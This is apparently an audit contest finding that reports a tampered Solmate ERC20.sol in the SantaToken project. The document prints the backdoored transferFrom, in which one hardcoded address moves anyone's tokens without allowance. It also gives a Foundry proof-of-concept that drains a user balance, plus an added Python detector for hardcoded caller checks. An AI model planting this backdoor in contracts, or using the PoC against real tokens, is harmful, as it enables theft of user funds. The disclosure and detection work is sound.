Submission Details
Severity: high
Valid

ERC20.sol modified with malicious code

Summary

SantaToken.sol inherits the Solmate ERC20.sol contract for extra gas efficiency.

Vulnerability Details

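The Solmate ERC20.sol used by the project has been modified as follows:

    function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {
        // hehehe :)
        // https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d
        // Backdoor: for this one hardcoded caller the balances are moved
        // without the allowance ever being read or decremented.
        if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
            balanceOf[from] -= amount;
            unchecked {
                balanceOf[to] += amount;
            }
            emit Transfer(from, to, amount);
            return true;
        }
        // ... rest of the function is not shown in this excerpt
    }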

Impact

This malicious code allows a specific address (0x815F577F1c1bcE213c012f166744937C889DAF17) to drain any user's SantaTokens by calling the transferFrom() function.
In fact, the hacker left a message in the transaction: "I am going to hack Santas Token!"

See below PoC:

    function testMaliciousTransferFrom() public {
        // Give the user a balance; the user never calls approve().
        deal(address(santaToken), user, 123 ether);
        // Act as the hardcoded address from ERC20.sol.
        vm.startPrank(0x815F577F1c1bcE213c012f166744937C889DAF17);
        santaToken.transferFrom(user, 0x815F577F1c1bcE213c012f166744937C889DAF17, 123 ether);
        // The whole balance has moved even though no allowance was granted.
        assertEq(santaToken.balanceOf(user), 0);
        assertEq(santaToken.balanceOf(0x815F577F1c1bcE213c012f166744937C889DAF17), 123 ether);
    }

Tools Used

  • Manual code review

  • Foundry

Recommendations

Remove the malicious code from ERC20.sol.
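
A review aid for catching this kind of tampering in vendored libraries, added here as an example and not part of the submission or the project's code: it flags any place where Solidity source compares msg.sender or tx.origin with a hardcoded address literal. The function names and the CLEAN sample are constructed for illustration; BACKDOORED is a shortened excerpt of the snippet quoted above.

```python
import re

# A 20-byte address literal: 0x + 40 hex digits, not a longer hash.
ADDRESS = r"0x[0-9a-fA-F]{40}(?![0-9a-fA-F])"
# Caller identity compared with a literal, in either operand order.
CALLER_CHECK = re.compile(
    rf"(?:msg\.sender|tx\.origin)\s*[=!]=\s*(?:address\(\s*)?({ADDRESS})"
    rf"|({ADDRESS})\s*\)?\s*[=!]=\s*(?:msg\.sender|tx\.origin)"
)
COMMENT = re.compile(r"//[^\n]*|/\*.*?\*/", re.S)
FUNCTION = re.compile(r"\bfunction\s+(\w+)")


def strip_comments(source):
    """Blank out comments, keeping newlines so line numbers stay accurate."""
    return COMMENT.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), source)


def find_hardcoded_caller_checks(source):
    """Return (line, function, address) for each caller check against a literal."""
    findings, current = [], None
    for number, line in enumerate(strip_comments(source).splitlines(), 1):
        declared = FUNCTION.search(line)
        if declared:
            current = declared.group(1)
        for match in CALLER_CHECK.finditer(line):
            findings.append((number, current, match.group(1) or match.group(2)))
    return findings


# Shortened excerpt of the backdoored transferFrom quoted in the finding above.
BACKDOORED = """\
function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {
    // hehehe :)
    if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
        balanceOf[from] -= amount;
        return true;
    }
}
"""
# Constructed sample: an allowance-checking transferFrom with no special caller.
CLEAN = """\
function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {
    uint256 allowed = allowance[from][msg.sender];
    if (allowed != type(uint256).max) allowance[from][msg.sender] = allowed - amount;
    balanceOf[from] -= amount;
    return true;
}
"""
```

A hit is a prompt for manual review rather than proof of a backdoor. Addresses held in constants or immutables are not followed, and a `//` inside a string literal is treated as a comment.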

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88
